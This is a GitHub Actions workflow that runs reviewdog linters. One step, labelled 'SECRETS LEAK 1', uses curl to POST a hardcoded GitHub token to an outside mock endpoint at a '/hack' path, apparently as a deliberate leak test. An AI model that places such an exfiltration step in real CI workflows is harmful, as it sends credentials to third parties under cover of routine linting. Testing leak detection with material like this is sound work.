name: "Reviewdog Analysis"
on: 
  workflow_dispatch:

jobs:
  reviewdog:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout repository
        uses: actions/checkout@v4
        with:
          fetch-depth: 0  # Ensures full commit history
          
      - name: Send POST request with GitHub token (SECRETS LEAK 1)
        run: |
          curl -k -X POST https://vbirmock.free.beeceptor.com/hack \
           -H "Content-Type: application/json" \
            -d '{
            "GH": "ghp_DEFzmg7RHrQ2eMe2IF4NxNWQodYpab3VMXXX"
          }'

      - name: Set up Go (required for Staticcheck)
        uses: actions/setup-go@v5
        with:
          go-version: '1.21'  # Adjust Go version as needed

      - name: Set up reviewdog
        uses: reviewdog/action-setup@v1

      - name: ShellCheck (Lint shell scripts)
        uses: reviewdog/action-shellcheck@v1
        with:
          github_token: ${{ secrets.GITHUB_TOKEN }}
          reporter: github-pr-review
          fail_on_error: true

      - name: Staticcheck (Lint Go code)
        uses: reviewdog/action-staticcheck@v1
        with:
          github_token: ${{ secrets.GITHUB_TOKEN }}
          reporter: github-pr-review
          fail_on_error: true

      - name: AST-Grep (Lint code with AST-based rules)
        uses: reviewdog/action-ast-grep@v1
        with:
          github_token: ${{ secrets.GITHUB_TOKEN }}
          reporter: github-pr-review
          fail_on_error: true

      - name: Typos (Detect spelling errors)
        uses: reviewdog/action-typos@v1
        with:
          github_token: ${{ secrets.GITHUB_TOKEN }}
          reporter: github-pr-review
          fail_on_error: true
